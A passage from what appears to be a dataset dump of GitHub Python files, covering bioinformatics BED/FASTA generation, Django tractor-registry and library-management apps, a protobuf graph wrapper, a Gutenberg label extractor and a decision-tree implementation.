main():\n ser = serial.Serial(arduino_serial, 9600)\n update_firmware(ser, sys.argv[1]);\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mmahut/tpmb","sub_path":"scripts/updatefw.py","file_name":"updatefw.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"14850475972","text":"#!/usr/bin/python3\n\nimport json\nimport re\nfrom Bio.Data import CodonTable\nfrom Bio import SeqIO\nimport sys\nimport os\n\n\ndef make_bed_and_fasta(cand_list, frame_dic, genome, prot_dic, selection_file):\n bed_dic = {}\n fasta_dic = {}\n\n frame_color_dic = {}\n\n frame_color_dic[1] = \"255,26,26\"\n frame_color_dic[2] = \"26,26,255\"\n frame_color_dic[3] = \"45,185,45\"\n frame_color_dic[4] = \"172,0,230\"\n frame_color_dic[5] = \"230,115,0\"\n frame_color_dic[6] = \"0,230,184\"\n\n bed_temp = \"{0} {1} {2} {3} 0 {4} {1} {2} {5} 1 {6} 0 1 1\"\n track_description = ('track name=\"Candidates\" description=\"Candidate\"'\n 'visibility=2 itemRgb=\"On\"')\n translation_table = CodonTable.ambiguous_dna_by_id[11]\n\n start_regex = re.compile('|'.join(translation_table.start_codons))\n canno_start_regex = re.compile(\"ATG|ATB|ATD|ATH|ATK|ATM|ATN|ATR|ATS|ATV|\" +\n \"ATX|DTG|MTG|NTG|RTG|VTG|WTG|XTG\")\n as_regex = re.compile(\"[IL]\")\n for i, orf in enumerate(cand_list):\n species = orf.split(\"|\")[0]\n psms = prot_dic[\"SIHUMI\"][\"6frame\"][orf]\n\n strand = \"+\" if orf.split(\"|\")[3] == \"1\" else \"-\"\n start = int(orf.split(\"|\")[4].split(\"-\")[0])\n stop = int(orf.split(\"|\")[4].split(\"-\")[1])\n chrom = orf.split(\"|\")[1]\n protein_seq = frame_dic[orf].seq\n\n if strand == \"+\":\n nuc_seq = genome[species][chrom][start:stop].seq\n else:\n nuc_seq = genome[species][chrom][start:stop].seq.reverse_complement()\n trans = nuc_seq.translate()\n if str(trans) != str(protein_seq):\n print(\"error! 6frame not equal to genome\")\n print(orf)\n raise\n\n if \"*\" in trans:\n print(\"error! stop codon in translation\")\n print(orf)\n raise\n pep_starts = []\n\n pep_start_dic = {}\n for psm in psms:\n peptide = psm[\"pep\"]\n pep_seq_regex = as_regex.sub(\"[IL]\", peptide)\n starts = [m.start() for m in re.finditer(pep_seq_regex,\n str(protein_seq))]\n pep_start_dic[min(starts)] = peptide\n pep_starts += starts\n\n # start of startcodons\n canno_start_starts = []\n for m in re.finditer(canno_start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n canno_start_starts.append(m.start())\n\n start_starts = []\n for m in re.finditer(start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n start_starts.append(m.start())\n\n # calculate first start codon before mapped pep start\n min_start = min(pep_starts)\n '''\n for psm in psms:\n peptide = psm[\"pep\"]\n if peptide == pep_start_dic[min_start]:\n print(peptide)\n break\n '''\n # looks if a cannonical start exist if not take also alternatives,\n # if that does not exist 0 is assumed\n next_start_codon = max([start for start in canno_start_starts if start <=\n min_start * 3] + [-1])\n if next_start_codon < 0:\n next_start_codon = max([start for start in start_starts if start <=\n min_start * 3] + [0])\n '''\n print(next_start_codon)\n print(start_starts)\n print(canno_start_starts)\n print(min_start)\n '''\n if strand == \"+\":\n start = start + next_start_codon\n frame = start % 3 + 1\n else:\n stop = stop - next_start_codon\n frame = stop % 3 + 4\n rgb = frame_color_dic[frame]\n name = selection_file + \"_\" + str(i + 1)\n if strand == \"+\":\n cand_seq = genome[species][chrom][start:stop].seq.translate()\n else:\n cand_seq = genome[species][chrom][start:stop].seq.reverse_complement().translate()\n\n fasta_dic[name] = \">\" + name + \"\\n\" + str(cand_seq) + \"\\n\"\n if species not in bed_dic.keys():\n bed_dic[species] = [track_description]\n\n bed_dic[species].append(bed_temp.format(chrom, start, stop, name,\n strand, rgb, stop - start))\n\n return bed_dic, fasta_dic\n\n\ndef main():\n selection_cut_off = int(sys.argv[1])\n selection_file = \"nov_psm\" + str(selection_cut_off)\n\n with open(\"./parameters.json\", \"r\") as file_handle:\n data_dir = json.load(file_handle)['data_dir']\n\n with open(\"./SIHUMI_info_dic.json\", \"r\") as file_handle:\n SIHUMI_info_dic = json.load(file_handle)\n\n db_dir = data_dir + \"/dbs\"\n frame_path = db_dir + \"/SIHUMI_6frame.fasta\"\n frame_dic = SeqIO.index(frame_path, \"fasta\")\n\n genome_dir = data_dir + \"/genome\"\n genome = {}\n for genbank_file in os.listdir(genome_dir):\n if genbank_file.endswith(\".gbk\"):\n species = genbank_file.split(\".\")[0]\n genome_path = genome_dir + \"/\" + genbank_file\n genome[species] = SeqIO.to_dict(SeqIO.parse(genome_path, \"genbank\"))\n\n accu_data_dir = data_dir + \"/accumulated_data\"\n\n with open(accu_data_dir + \"/prot_dic.json\", \"r\") as file_handle:\n prot_dic = json.load(file_handle)\n\n cand_dir = data_dir + \"/candidates\"\n with open(cand_dir + \"/\" + selection_file + \"_list.json\", \"r\") as file_handler:\n cand_list = json.load(file_handler)\n\n bed_dic, fasta_dic = make_bed_and_fasta(cand_list, frame_dic, genome,\n prot_dic, selection_file)\n\n bed_dir = cand_dir + \"/bed_dir/\" + selection_file + \"/\"\n for species in SIHUMI_info_dic.keys():\n with open(bed_dir + species + \"_cand.bed\", \"w\") as file_handler:\n file_handler.write(\"\\n\".join(bed_dic[species]) + \"\\n\")\n\n blast_dir = cand_dir + \"/blast/{}/\".format(selection_file)\n for name, content in fasta_dic.items():\n with open(blast_dir + name + \".fasta\", \"w\") as file_handler:\n file_handler.write(content)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\n'''\n","repo_name":"JohnBioinf/PROTMAP_scripts","sub_path":"candidates/make_bed_and_fasta.py","file_name":"make_bed_and_fasta.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71082188809","text":"from django.shortcuts import render,HttpResponseRedirect\nfrom .forms import LoginForm,TractorForm\nfrom .models import TractorDetail\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login,logout\nfrom .forms import MyUserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef home_page(request):\n fm=TractorDetail.objects.all()\n return render(request,'app/tractorlist.html',{'form':fm})\n\ndef detail_page(request,pk):\n dt=TractorDetail.objects.filter(pk=pk)\n return render(request,'app/detail.html',{'data':dt})\n\ndef registration_page(request):\n if request.method==\"POST\":\n fm=MyUserCreationForm(request.POST)\n if fm.is_valid() :\n messages.success(request,'Congratulations You have registered ')\n fm.save()\n fm=MyUserCreationForm()\n else: \n fm=MyUserCreationForm()\n return render(request,'app/registration.html',{'form':fm})\n\ndef login_page(request):\n if request.method==\"POST\":\n fm=LoginForm(request,data=request.POST)\n if fm.is_valid():\n un=fm.cleaned_data['username']\n pa=fm.cleaned_data['password']\n User=authenticate(username=un,password=pa)\n if User is not None:\n login(request,User)\n return HttpResponseRedirect('/tractorreg/')\n else:\n fm=LoginForm()\n return render(request,'app/login.html',{'form':fm})\n \n@ login_required(login_url='/login/') \ndef tractorreg_page(request):\n if request.method==\"POST\":\n user=request.user\n fms=TractorForm(request.POST)\n if fms.is_valid():\n brand= fms.cleaned_data['brand']\n model_no= fms.cleaned_data['model_no']\n hp_category= fms.cleaned_data['hp_category']\n implements= fms.cleaned_data['implements']\n fm=TractorDetail(user=user,brand=brand,model_no=model_no,hp_category=hp_category,implements=implements)\n fm.save()\n messages.success(request,'Congratulations detail Updated Succefully ')\n fm=TractorForm()\n else:\n fm=TractorForm()\n return render(request,'app/tractorreg.html',{'form':fm,'active':'btn-primary'})\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n\n ","repo_name":"yeshudeshmukh/tractorrecord","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15211449756","text":"from lt_sdk.proto import lgf_pb2, node_filters, ops_pb2\n\n\nclass LightGraph(object):\n \"\"\"\n Wrapper around lgf_pb2.LGF() protobuf with some helper functions\n Immutable data type\n \"\"\"\n\n CONTROL_FLOW_OPS = {\n ops_pb2.ENTER,\n ops_pb2.SWITCH,\n ops_pb2.MERGE,\n ops_pb2.NEXT_ITERATION,\n ops_pb2.EXIT,\n }\n\n CONST_OPS = {\n ops_pb2.CONST,\n ops_pb2.VARIABLE,\n }\n\n CONST_NODES = {\n lgf_pb2.LNF.const.DESCRIPTOR.name,\n lgf_pb2.LNF.variable.DESCRIPTOR.name,\n }\n\n IS_CONST_ATTR = \"is_constant\"\n\n def __init__(self,\n nodes,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n meta_graph_info=None):\n \"\"\"\n Params:\n subgraphs: a list of lgf_pb2.LNF() protobufs\n input_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_nodes: a optional list of strings corresponding to output node names\n meta_graph_info: an optional lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n input_edges = input_edges or []\n output_edges = output_edges or []\n output_node_names = output_node_names or []\n\n self._nodes = [self._copy_node(node) for node in nodes]\n self._input_edges = []\n input_names = set()\n for edge_info in input_edges:\n tup = (edge_info.name, edge_info.port)\n if tup not in input_names:\n input_names.add(tup)\n self._input_edges.append(self._copy_edge_info(edge_info))\n\n self._output_edges = [\n self._copy_edge_info(edge_info) for edge_info in output_edges\n ]\n self._output_node_names = list(output_node_names)\n\n if meta_graph_info is None:\n self._meta_graph_info = lgf_pb2.MetaGraphInfo()\n else:\n self._meta_graph_info = self._copy_meta_graph_info(meta_graph_info)\n\n # Dictionaries for fast lookups\n self._node_dict = {node.name: node for node in self._nodes}\n self._node_to_input_node_names = {node.name: set() for node in self._nodes}\n self._node_to_output_node_names = {node.name: set() for node in self._nodes}\n self._edge_dict = {}\n\n for node in self._nodes:\n # Input and output node names\n for e in node.inputs:\n if e.name in self._node_dict:\n self._node_to_input_node_names[node.name].add(e.name)\n self._node_to_output_node_names[e.name].add(node.name)\n for inp_name in node.control_inputs:\n if inp_name in self._node_dict:\n self._node_to_input_node_names[node.name].add(inp_name)\n self._node_to_output_node_names[inp_name].add(node.name)\n\n # Edges\n for e in list(node.inputs) + list(node.outputs):\n self._edge_dict[(e.name, e.port)] = e\n\n # Sort the input and output node names so they are always in the same order\n self._node_to_input_node_names = {\n k: sorted(v) for k,\n v in self._node_to_input_node_names.items()\n }\n self._node_to_output_node_names = {\n k: sorted(v) for k,\n v in self._node_to_output_node_names.items()\n }\n\n # Make sure required nodes are in the graph\n for node_name in self._meta_graph_info.required_nodes:\n if node_name not in self._node_dict:\n raise ValueError(\"Required node {} not found in graph\".format(node_name))\n\n def __eq__(self, other_graph):\n node_dict = self.node_dict()\n other_node_dict = other_graph.node_dict()\n\n if set(node_dict.keys()) != set(other_node_dict.keys()):\n return False\n\n return all(node_dict[name] == other_node_dict[name] for name in node_dict)\n\n def _copy_node(self, node):\n node_copy = lgf_pb2.LNF()\n node_copy.CopyFrom(node)\n return node_copy\n\n def _copy_edge_info(self, edge_info):\n edge_info_copy = lgf_pb2.EdgeInfo()\n edge_info_copy.CopyFrom(edge_info)\n return edge_info_copy\n\n def _copy_meta_graph_info(self, meta_graph_info):\n meta_graph_info_copy = lgf_pb2.MetaGraphInfo()\n meta_graph_info_copy.CopyFrom(meta_graph_info)\n return meta_graph_info_copy\n\n def nodes(self):\n \"\"\"\n Returns a list of nodes in the graph\n Always in the same order as the nodes used to initialize this object\n \"\"\"\n return [self._copy_node(node) for node in self._nodes]\n\n def node_dict(self):\n return {node.name: node for node in self.nodes()}\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._copy_node(self._node_dict[node_name])\n\n def has_node(self, node_name):\n \"\"\"Returns True if there is a node with the given name\"\"\"\n return node_name in self._node_dict\n\n def get_edge(self, name, port):\n \"\"\"Returns an edge in the graph with the given name and port\"\"\"\n return self._copy_edge_info(self._edge_dict[(name, port)])\n\n def input_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.InputInfo() protobufs specifying the inputs of\n the graph. Always in the same order as the inputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._input_edges]\n\n def output_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.OutputInfo() protobufs specifying the outputs of\n the graph. Always in the same order as the outputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._output_edges]\n\n def output_node_names(self):\n \"\"\"\n Returns a list of strings corresponding to output nodes of the graph\n \"\"\"\n return list(self._output_node_names)\n\n def get_input_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the input node names of the given node\n \"\"\"\n return list(self._node_to_input_node_names[node.name])\n\n def get_output_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the output node names of the given node\n \"\"\"\n return list(self._node_to_output_node_names[node.name])\n\n def meta_graph_info(self):\n \"\"\"\n Returns a lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n return self._copy_meta_graph_info(self._meta_graph_info)\n\n def prune_graph(self,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n include_inputs=True):\n \"\"\"Returns a new light_graph object.\"\"\"\n # Inputs and outputs of pruned graph are the same\n input_edges = input_edges or self.input_edges()\n output_edges = output_edges or self.output_edges()\n output_node_names = output_node_names or self.output_node_names()\n\n # Node filter for input nodes\n input_node_filter = node_filters.and_filter(*[\n node_filters.not_filter(node_filters.name_is_filter(e.name))\n for e in input_edges\n ])\n\n # Get the root nodes for pruning, include required nodes\n root_nodes = [self.get_node_by_name(e.name) for e in output_edges] + [\n self.get_node_by_name(node_name) for node_name in output_node_names\n ] + [\n self.get_node_by_name(node_name)\n for node_name in self._meta_graph_info.required_nodes\n ]\n\n # Only keep nodes that the outputs depend on\n nodes = []\n node_names = set()\n for i, root_node in enumerate(root_nodes):\n # Do not use the input node filter for required nodes\n if i < (len(output_edges) + len(output_node_names)):\n node_filter = input_node_filter\n else:\n node_filter = None\n\n for node in self.bfs(root_node, node_filter=node_filter):\n if node.name not in node_names:\n nodes.append(node)\n node_names.add(node.name)\n\n # Make sure inputs and outputs come from the original graph\n input_edges = [self.get_edge(e.name, e.port) for e in input_edges]\n output_edges = [self.get_edge(e.name, e.port) for e in output_edges]\n\n # Add input nodes if necessary\n if include_inputs:\n for e in input_edges:\n if e.name in self._node_dict and e.name not in node_names:\n nodes.append(self._node_dict[e.name])\n node_names.add(e.name)\n\n return LightGraph(nodes,\n input_edges=input_edges,\n output_edges=output_edges,\n output_node_names=output_node_names,\n meta_graph_info=self.meta_graph_info())\n\n def bfs(self,\n root_node,\n bidirectional=False,\n node_filter=None,\n skip_control_inputs=False):\n \"\"\"\n Does a BFS on the graph starting at the root_node\n\n Params:\n root_node: starting node for the BFS\n bidirectional: If False, look at a nodes inputs when doing the BFS and\n discovering new nodes. If True do a bidirectional search, looking at\n a nodes inputs and outputs when discovering new nodes.\n node_filter: If provided, only add nodes to the frontier that match the\n filter with this graph. Note that if the root_node does not match the\n provided filter, no nodes will be returned.\n \"\"\"\n # Check for unsupported cases\n if bidirectional and skip_control_inputs:\n raise ValueError(\"Bidirectional BFS is currently unsupported when\" +\n \"skipping control inputs\")\n\n # Update node filter with defaults\n default_filter = node_filters.not_filter(\n node_filters.name_starts_with_filter(\"^\"))\n if node_filter is None:\n node_filter = default_filter\n else:\n node_filter = node_filters.and_filter(default_filter, node_filter)\n\n # Special case when the root_node does not match node_filter\n if not (node_filter.matches(root_node, self)):\n return []\n\n # BFS\n visited_node_names = {root_node.name}\n current_nodes = [root_node]\n frontier = []\n while current_nodes:\n for parent_node in current_nodes:\n yield self._copy_node(parent_node)\n\n # Default uses inputs for child nodes\n if skip_control_inputs:\n # Skip control inputs\n child_nodes = [\n self._node_dict[e.name]\n for e in parent_node.inputs\n if self.has_node(e.name)\n ]\n else:\n # Include control inputs\n child_nodes = [\n self._node_dict[n]\n for n in self._node_to_input_node_names[parent_node.name]\n ]\n\n # Bidirectional adds outputs as well, currently always includes\n # control inputs\n if bidirectional:\n child_nodes += [\n self._node_dict[n]\n for n in self._node_to_output_node_names[parent_node.name]\n ]\n\n for child_node in child_nodes:\n if (child_node.name not in visited_node_names\n and node_filter.matches(child_node,\n self)):\n visited_node_names.add(child_node.name)\n frontier.append(child_node)\n\n current_nodes = frontier\n frontier = []\n\n @staticmethod\n def _is_const(node):\n if node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name):\n return node.original.op in LightGraph.CONST_OPS\n else:\n return node.WhichOneof(\"node\") in LightGraph.CONST_NODES\n\n def is_constant_node(self, node):\n \"\"\"\n Check whether a node is constant.\n\n A node is constant provided all of its non-control incoming inputs come from\n constant nodes.\n If a node has no inputs and self._is_const(node) is False, it is defined to be\n a non-constant node.\n If a node is a control flow op, it is defined to be a non-constant node unless\n it is an Enter node with the attribute is_constant == True.\n \"\"\"\n # Traverse the subtree rooted at node, skipping control inputs\n for child_node in self.bfs(node, skip_control_inputs=True):\n # Control flow ops not constant\n if (child_node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name)\n and child_node.original.op in self.CONTROL_FLOW_OPS):\n # Exception for constant enter node\n if child_node.original.op == ops_pb2.ENTER and child_node.original.attr[\n self.IS_CONST_ATTR].b:\n continue\n\n return False\n\n # Found a leaf of the subtree if\n # 1) The node has no non-control inputs\n # 2) The node has a non-control input edge that does not come from\n # a node inside the graph (an input edge to the graph)\n if (not len(child_node.inputs)\n or any([not self.has_node(e.name) for e in child_node.inputs])):\n # Found a non-constant leaf in the subtree\n if not self._is_const(child_node):\n return False\n\n return True\n\n def as_lgf_pb(self):\n \"\"\"\n Returns the Lightelligence Graph Format (LGF) Protobuf corresponding to\n this graph\n \"\"\"\n lgf_pb = lgf_pb2.LGF()\n lgf_pb.nodes.extend(self.nodes())\n lgf_pb.input_edges.extend(self.input_edges())\n lgf_pb.output_edges.extend(self.output_edges())\n lgf_pb.output_node_names.extend(self.output_node_names())\n lgf_pb.meta_graph_info.CopyFrom(self.meta_graph_info())\n\n return lgf_pb\n\n @classmethod\n def lgf_pb_to_graph(cls, lgf_pb):\n \"\"\"Converts a LGF Proto to a LightGraph object\"\"\"\n return cls(list(lgf_pb.nodes),\n list(lgf_pb.input_edges),\n list(lgf_pb.output_edges),\n list(lgf_pb.output_node_names),\n meta_graph_info=lgf_pb.meta_graph_info)\n\n @staticmethod\n def read_lgf_pb(lgf_pb_path):\n \"\"\"Reads a LGF Proto from the binary file at lgf_pb_path\"\"\"\n light_graph = lgf_pb2.LGF()\n with open(lgf_pb_path, \"rb\") as f:\n light_graph.ParseFromString(f.read())\n\n return light_graph\n\n @staticmethod\n def write_lgf_pb(lgf_pb, lgf_pb_path):\n \"\"\"Writes lgf_pb as a binary file to lgf_pb_path\"\"\"\n with open(lgf_pb_path, \"wb\") as f:\n f.write(lgf_pb.SerializeToString())\n\n @staticmethod\n def from_pb(lgf_pb_path):\n return LightGraph.lgf_pb_to_graph(LightGraph.read_lgf_pb(lgf_pb_path))\n\n\nclass MutableLightGraph(LightGraph):\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._node_dict[node_name]\n","repo_name":"HermanYang/SDKDocs","sub_path":"lt_sdk/graph/lgf_graph.py","file_name":"lgf_graph.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45241471790","text":"from django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . import views\r\nfrom django.contrib.auth import views as auth_views\r\nfrom django.views.generic.base import RedirectView\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n path('admin_home',views.home, name=\"home-page\"),\r\n path('login',views.login_view,name='login-page'),\r\n path('register',views.userregister,name='register-page'),\r\n path('save_register',views.save_register,name='register-user'),\r\n path('user_login',views.login_user,name='login-user'),\r\n path('home',views.home,name='home-page'),\r\n path('logout',views.logout_user,name='logout'),\r\n path('profile',views.profile,name='profile-page'),\r\n path('update_password',views.update_password,name='update-password'),\r\n path('update_profile',views.update_profile,name='update-profile'),\r\n path('users',views.users,name='user-page'),\r\n path('manage_user',views.manage_user,name='manage-user'),\r\n path('manage_user/',views.manage_user,name='manage-user-pk'),\r\n path('save_user',views.save_user,name='save-user'),\r\n path('delete_user/',views.delete_user,name='delete-user'),\r\n path('category',views.category,name='category-page'),\r\n path('manage_category',views.manage_category,name='manage-category'),\r\n path('manage_category/',views.manage_category,name='manage-category-pk'),\r\n path('view_category/',views.view_category,name='view-category-pk'),\r\n path('save_category',views.save_category,name='save-category'),\r\n path('delete_category/',views.delete_category,name='delete-category'),\r\n path('sub_category',views.sub_category,name='sub_category-page'),\r\n path('manage_sub_category',views.manage_sub_category,name='manage-sub_category'),\r\n path('manage_sub_category/',views.manage_sub_category,name='manage-sub_category-pk'),\r\n path('view_sub_category/',views.view_sub_category,name='view-sub_category-pk'),\r\n path('save_sub_category',views.save_sub_category,name='save-sub_category'),\r\n path('delete_sub_category/',views.delete_sub_category,name='delete-sub_category'),\r\n path('books',views.books,name='book-page'),\r\n path('manage_book',views.manage_book,name='manage-book'),\r\n path('manage_book/',views.manage_book,name='manage-book-pk'),\r\n path('view_book/',views.view_book,name='view-book-pk'),\r\n path('save_book',views.save_book,name='save-book'),\r\n path('delete_book/',views.delete_book,name='delete-book'),\r\n path('members',views.members,name='member-page'),\r\n path('manage_member',views.manage_member,name='manage-member'),\r\n path('manage_member/',views.manage_member,name='manage-member-pk'),\r\n path('view_member/',views.view_member,name='view-member-pk'),\r\n path('save_member',views.save_member,name='save-member'),\r\n path('delete_member/',views.delete_member,name='delete-member'),\r\n path('borrows',views.borrows,name='borrow-page'),\r\n path('manage_borrow',views.manage_borrow,name='manage-borrow'),\r\n path('manage_borrow/',views.manage_borrow,name='manage-borrow-pk'),\r\n path('view_borrow/',views.view_borrow,name='view-borrow-pk'),\r\n path('save_borrow',views.save_borrow,name='save-borrow'),\r\n path('delete_borrow/',views.delete_borrow,name='delete-borrow'),\r\n path(\"view_issued_book/\", views.view_issued_book, name=\"view_issued_book\"),\r\n\r\n ####chats\r\n path('ucchat/', views.UCreateChat.as_view(), name='ucchat'),\r\n path('ulchat/', views.UListChat.as_view(), name='ulchat'),\r\n \r\n path('acchat/', views.ACreateChat.as_view(), name='acchat'),\r\n path('alchat/', views.AListChat.as_view(), name='alchat'),\r\n\r\n\r\n path('Memberregister/',views.Memberregister, name='member_register'),\r\n\r\n\r\n\r\n\r\n #members\r\n path('',views.members_home,name=\"members-home\"),\r\n path('signup/', views.members_register, name='signup'),\r\n path('members_home',views.members_homepage,name=\"members-homepage\"),\r\n path('member_borrow',views.memberborrow,name='member-borrow-page'),\r\n path('member_details',views.MemberDetails_save,name=\"MemberDetails-save\"),\r\n path('view/',views.ViewMember,name='viewmember'),\r\n path('members_book_page',views.members_bookpage,name=\"members-book-page\"),\r\n path('transactions',views.Transaction,name=\"transaction\"),\r\n path('manage_transaction',views.manage_transaction,name='manage-transaction'),\r\n path('manage_transaction/',views.manage_transaction,name='manage-transaction-pk'),\r\n # path('view_transaction/',views.Transaction,name='view-transaction-pk'),\r\n path('save_transaction',views.save_transaction,name='save-transaction'),\r\n path('delete_transaction/',views.delete_transaction,name='delete-transaction'),\r\n path('fines',views.memberfine,name='fines'),\r\n path('collections',views.collections,name=\"collection\"),\r\n path('bookinfo',views.BookInfo,name=\"bookinfo\"),\r\n path(\"issued_books/\", views.issued_books, name=\"issued_books\"),\r\n\r\n\r\n\r\n\r\n]+ static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\r\n","repo_name":"ericdev-202/library","sub_path":"django_lms/lmsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71374557768","text":"# extract *all* labels from project gutenberg\n\nfrom gutenberg.query import get_metadata\n\n# when running this code for the first time, you have to create a cache of the meta data. This may take some time\n# (according to the author of the package - compare https://pypi.org/project/Gutenberg/ -, it took 18hrs on his machine,\n# on mine it was less than 4 - I didn't check earlier, because I expected it would be around 18 as well.\n#\n# from gutenberg.acquire import get_metadata_cache\n#\n# cache = get_metadata_cache()\n# cache.populate()\n\n# list supported types of metadata\n# from gutenberg.query import list_supported_metadatas\n# print(list_supported_metadatas())\n\nresults = {}\n\nfor i in range(1, 57700):\n try:\n if get_metadata('language', i) == frozenset({'en'}):\n print(i)\n labels = get_metadata('subject', i)\n results[i] = labels\n except:\n print(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\")\n with open(\"./log/label_extraction.txt\", 'a+') as logfile:\n logfile.write(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\\n\")\n\npath = \"../data/labels.txt\"\nwith open(path, \"w\") as file:\n file.write(str(results))\n","repo_name":"Berndinio/AML_project","sub_path":"scripts/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3780340485","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass DecisionTree(object):\n \"\"\"Decision Tree.\n\n Implements the base class from which `ClassificationTree` and\n `RegressionTree` are built upon. All the functionality is defined in the\n base class `DecisionTree` except for evaluating a split and checking if a\n Leaf has been reached.\n\n Parameters\n ----------\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, max_depth=None):\n self.max_depth = max_depth\n\n def fit(self, X, y):\n \"\"\"Fit a decision tree model to the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the training data.\n y : ndarray\n A column vector with the true target values.\n\n Returns\n self\n \"\"\"\n self.root = self.partition(X, y)\n return self\n\n def predict(self, X, y=None):\n \"\"\"Predict the target for a data row `X`.\n\n Parameters\n ----------\n X : ndarray\n A data row of shape (n_features,).\n\n Returns\n -------\n pred : float or int\n Prediction for the data row `X`.\n \"\"\"\n pred = np.zeros(shape=(X.shape[0], 1))\n for i in range(X.shape[0]):\n pred[i] = self.traverse(X[i, :], self.root)\n return pred\n\n def traverse(self, X, node):\n \"\"\"Traverse the tree.\n\n Parameter\n ---------\n X : ndarray\n A single row of data.\n node: TreeNode instance\n The node should be the root of the tree.\n\n Returns\n -------\n pred : float\n The prediction for row `X`.\n \"\"\"\n if isinstance(node, Leaf):\n return node.pred\n if X[node.feature] <= node.split_val:\n return self.traverse(X, node.left_child)\n else:\n return self.traverse(X, node.right_child)\n\n def partition(self, X, y, depth=0):\n \"\"\"Partition the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the data.\n y : ndarray\n A column vector with the true target values.\n depth : int\n The maximum depth of the tree to grow.\n\n Returns\n -------\n node : TreeNode instance\n A node which represents the root of the fitted tree.\n \"\"\"\n check = self.check_partition(y, depth)\n if isinstance(check, Leaf):\n return check\n\n feature, split_val = self.find_feature(X, y)\n X_left = X[X[:, feature] <= split_val]\n X_right = X[X[:, feature] > split_val]\n y_left = y[X[:, feature] <= split_val]\n y_right = y[X[:, feature] > split_val]\n\n node = TreeNode(feature, split_val, self.partition(X_left, y_left, depth+1),\n self.partition(X_right, y_right, depth+1))\n return node\n\n def find_feature(self, X, y):\n \"\"\"Find a feature to split.\n\n Parameters\n ----------\n X : ndarray\n y : ndarray\n\n Returns\n -------\n best_feature : int\n The index of the best feature to split.\n best_split : float\n The best value to split at.\n \"\"\"\n cost_low = np.inf\n best_feature = None\n best_split = None\n for i in range(X.shape[1]):\n cost, split_val = self.find_split(X[:, i], y)\n if cost < cost_low:\n best_feature = i\n best_split = split_val\n cost_low = cost\n return best_feature, best_split\n\n def find_split(self, feature, y):\n \"\"\"Find best split.\n\n Find the best split given the values for the provided feature.\n\n Parameters\n ----------\n feature : ndarray\n An column vector with the values for one feature. Should be of\n shape (m,).\n y : ndarray\n A column vector with the true labels for the column vector\n `feature`. Should be of shape (m,).\n\n Returns\n -------\n cost_low : float\n The lowest cost that can be achieved by splitting the feature at\n the value `best_split`.\n best_split : float\n The value in `feature` which is the best split, i.e. the split that\n minimize the cost.\n \"\"\"\n idx_sorted = np.argsort(feature)\n feature = feature[idx_sorted]\n y = y[idx_sorted]\n cost_low = np.inf\n best_split = None\n for v in np.unique(feature)[:-1]:\n r1 = y[feature <= v]\n r2 = y[feature > v]\n cost = self.eval_split(r1, r2)\n if cost < cost_low:\n cost_low = cost\n next_val = feature[feature > v][0]\n best_split = (v + next_val) / 2\n return cost_low, best_split\n\n def eval_split(self, r1, r2):\n raise NotImplementedError\n\n def check_partition(self, y, depth):\n raise NotImplementedError\n\n\nclass ClassificationTree(DecisionTree):\n \"\"\"Classification tree.\n\n Implements decision tree which can be used for classification. It is built\n on the class `DecisionTree` with the only addition is to compute the cost\n function when deciding splits.\n\n Parameters\n ----------\n impurity_measure : {'gini', 'entropy'}\n Defines which impurity measure which should be used when fitting the\n tree.\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, impurity_measure='gini', max_depth=None):\n self.impurity_measure = impurity_measure\n super().__init__(max_depth=max_depth)\n\n def check_partition(self, y, depth):\n \"\"\"Check if `y` only contains one class or if the maximum depth is\n reached.\n\n Parameters\n ----------\n y : 